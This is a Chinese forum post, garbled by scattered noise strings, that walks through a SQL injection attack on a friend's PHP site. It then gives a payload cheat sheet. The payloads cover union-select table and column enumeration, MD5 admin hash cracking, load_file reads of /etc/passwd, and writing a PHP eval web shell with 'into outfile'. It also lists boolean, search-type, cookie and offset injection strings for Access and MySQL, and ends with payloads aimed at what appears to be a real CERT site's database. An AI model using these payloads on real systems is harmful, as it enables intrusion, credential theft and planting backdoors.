我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
; ^6 n0 Z( Y8 T$ X让我看看,既然人家开口了,我也不好拒绝,那就看看吧?# |+ X, @- I& s
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。3 T/ A0 W# C0 o: W3 B! N2 o
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
* B9 W$ E7 H& b1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)0 {; i/ n' r, v6 O
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
7 a, u' D2 V+ R9 [Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in+ d4 O7 p% y6 i2 h% W
/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
1 U+ x& M+ S4 v" D
5 ]# S& U: A% A2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,; Z$ n1 Y; I% H+ X7 x' U
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意. ^4 S: @: o' ^) H
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
! ?+ B. `7 X/ ^/ \5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。: ]2 K; F( F( H# m, w+ C, ?
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,* w6 e) a* [% c U0 A2 ]8 q
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。9 I: Z0 Q J9 g0 N- X
我就用的是第二个思路,
& Y( {- ~4 s& \0 F9 e提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1--
+ |! m( h) k5 G# }# _6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
k6 Q8 N$ w" r! d$ F p* ~提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
4 _4 G: T) T, i& d' s- W# y5 X注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
7 x& n0 x4 l- g7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????# p1 G e7 w; i
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
6 M; `9 M, _! \8 g0 s T) m提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
8 j$ T! f; N* M然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,% i$ b- m: {3 _- }3 J
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
: {+ u: a8 h' j# p" h下面是一些很普遍注入方式资料:
2 ^2 X% i! F, `' I* b; H+ q0 v注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='0 u, k" v1 J# y
拆半法
% |6 ^" e0 ^4 g( S8 Q5 j/ k######################################
! |8 E5 j w7 O( T- b6 U. {and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
" q' E. }0 R) {! X! Kand exists (select * from admin)
% e$ ]( H) D% u* f" K. nand exists(select id from admin)
; m- c* ]4 R0 H# X5 s% k$ P" eand exists(select id from admin where id=1). w5 h o- H# c$ O) ]* E ~, P
and exists(select id from admin where id>1)
& w. P1 s. T+ D6 ~2 m- \8 F然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
" T: s* D, K" S, e' g& W! K1 Uand exists (select username from admin)
3 d+ ~& A; I I5 h( F( }* Mand exists (select password from admin)# \8 S2 q2 Z- c% A' ?9 F! R
and exists (select id from admin where len(username)<10 and id=1)
. K0 L# F+ w9 d9 X/ X! q4 Tand exists (select id from admin where len(username)>5 and id=1)
1 c( _( j; o5 _- Sand exists (select id from admin where len(username)=6 and id=1)- U* n/ d: @9 b; f
and exists (select id from admin where len(password)<10 and id=1): M4 W* U* L, S% B/ j
and exists (select id from admin where len(password)>5 and id=1); B+ O3 a) f! k
and exists (select id from admin where len(password)=7 and id=1)) d) M3 R8 J! x' z: B" p9 b
and (select top 1 asc(mid(username,1,1)) from admin)=97
0 O( l" l: V5 M4 \+ E0 H2 u" e返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。( k$ ~+ j% J$ q8 K- j, c3 @% n4 T: y
猜第二位把username,1,1改成username,2,1就可以了。7 h8 t; R, X& H# c
猜密码把username改成password就OK了% @1 B% u. X7 B6 n2 r% t* M A
##################################################
' T- G& F. a$ |搜索型注入6 v. X |% ]2 k6 C8 j9 G
##################################6 _; W# n4 \& a/ l+ I# p; }. p
%' and 1=1 and '%'='
6 _: p2 j. z& m$ r; p" }, r%' and exists (select * from admin) and '%'='8 j1 d V: S$ R
%' and exists(select id from admin where id=1) and '%'=') M! g7 K/ b7 j5 m
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
9 ~# _ o w: U" q5 L%' and exists (select id from admin where len(password)=7 and id=1) and '%'='* P8 W5 ^" G" @4 F
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='4 s2 }0 Y" f H1 W2 r
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
' w5 _9 U& G7 H# }0 T, u p S) u对于MSSQL数据库,后面可以吧 and '%'='换成--
( h7 _0 J& v1 [还有一点搜索型注入也可以使用union语句。( J; D" |2 b$ ]# m6 F
########################################################
9 \) q4 ?, B+ R3 M9 A联合查询。
" m9 D2 N: Y- ~( X. T# h#####################################. Z# p/ o! z1 Y
order by 10
+ L! l& K+ H% y6 q* i5 T0 Z* `" Hand 1=2 union select 1,2,3,4,5,6,7,8,9,10
# [6 i, g' v. R1 a# S/ H: land 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin ^# V* Y! w8 |" s& a! G1 P( y5 T
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
: {2 R0 k' z0 J, X很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
1 J0 E" O* q8 x, c###################################
9 \( h' a2 m ccookie注入" j) o9 E/ o! t: _' I
###############################
" m0 R4 k: ~; Z- |( A1 Mhttp://www.******.com/shownews.asp?id=127
3 B3 C, h" I& v8 w* J' M g Ahttp://www.******.com/shownews.asp; ]1 [- \& u; `& s4 o1 J {2 q
alert(="id="+escape("127"));* p& A7 U4 E1 f5 S* U6 P* M
alert(="id="+escape("127 and 1=1"));
% d- R8 k. o6 D4 lalert(="id="+escape("127 order by 10"));
6 ?- W+ v( K' T- n# C2 o: falert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));8 j4 O! d% l- |" N! x
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));5 j* o' r$ a, \4 m$ W" e" Q
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。& I5 F" }( L4 n4 K
###################################
6 K2 i* J' S* u偏移注入3 ^3 K) e; _7 w6 C& q
###########################################################) Q, w( U% n) e: j' Y- T
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
" [2 w8 K7 P1 S+ t& j$ `& [union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin2 L: m. ?. p2 |- u Z: O
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)! V" V+ \: ?" p% i! ^, L# G
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
5 I U7 e/ \/ \0 n0 {( s. \ j2 junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)# p6 k( N; i' J! Y( b" {+ j: n
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
) c6 q6 r6 ?% E) d Eunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on! C) ]- j h0 P4 L D
a.id=d.id)
- V, X6 Y& A X8 `- x1 vand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
8 n! @! W+ J, C" M# W/ Land 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) & G$ y$ N5 Z0 O; c9 j* X4 J6 j" {
1 `* n) g+ }3 c8 c, ?============================================================================================================ w& F, q6 d8 e2 D! t; p0 d; P
1.判断版本
+ H4 K5 I b0 l, |* V$ Y/ yand ord(mid(version(),1,1))>51+ U2 o8 D. Z! Q7 l
返回正常,说明大于4.0版本,支持ounion查询
$ S2 N4 A9 q# V8 L: A J2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解) B' w% J9 X* y* j% b
and 2=4 union select 1,2,3,4,5,6,7,8,9--# X, [9 [( `& U' A& x
3.查看数据库版本及当前用户,7 k4 Z9 ~0 c7 q$ [/ G
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--! h! a! J1 o" T: V
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,6 M# K$ p) C* C' ^- ?: N
4.判断有没有写权限
) r+ p- u+ @! \0 u2 _and (select count(*) from MySQL.user)>0-- : B* w3 ]' S7 Z6 S
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
" ]4 P$ {+ {" s8 a" g用不了这个命令,就学习土耳其黑客手法,如下( b# l4 W" R7 S& O3 r' ~. W8 U
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--; L: V0 U- g# R$ ^
6.爆表,爆库
$ D& ~+ w5 ^ l6 n. {9 f" Gand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--2 R6 w" {8 q" ~" _' g8 Z* r* P1 W
7.爆列名,爆表2 P3 R) O9 ^: H' ?9 ?( u6 @
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--5 a: V4 W6 Q7 ~ ]9 C c" ~
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
6 x' M0 _. i8 g; u0 _+ ?* w* ^and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--' m% s. e8 \6 k0 \" C
9.爆字段内容; p( e4 R" e6 Y! f
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
1 \4 N3 K3 {/ S- L/ [5 Lhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |